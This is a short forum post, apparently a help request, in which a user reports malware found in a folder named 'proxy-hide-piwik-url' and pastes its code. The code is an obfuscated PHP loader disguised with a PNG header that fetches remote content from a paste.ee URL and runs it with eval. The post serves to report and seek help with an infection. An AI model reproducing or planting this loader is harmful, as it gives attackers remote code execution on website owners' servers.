I got a malware under a folder named "proxy-hide-piwik-url, containing a file containing this code:
%PNG
<?php
${"GLOBALS"}["delves"]="love";
${"GLOBALS"}["0xfah"]="you";
error_reporting(0);
set_time_limit(0);
${"GLOBALS"}["i"]="love";
${"GLOBALS"}["haxor"]="love";
${${"GLOBALS"}["haxor"]}=curl_init();
${"GLOBALS"}["world"]="love";
${"GLOBALS"}["Thxngfa"]="love";
curl_setopt(${${"GLOBALS"}["i"]},
CURLOPT_URL,"https://paste.ee/r/MBkVN/0");
curl_setopt(${${"GLOBALS"}["world"]},CURLOPT_RETURNTRANSFER,1);
${${"GLOBALS"}["0xfah"]}=curl_exec(${${"GLOBALS"}["delves"]});
curl_close(${${"GLOBALS"}["Thxngfa"]});
eval("?>".${${"GLOBALS"}["0xfah"]});
?>
5 posts - 3 participants
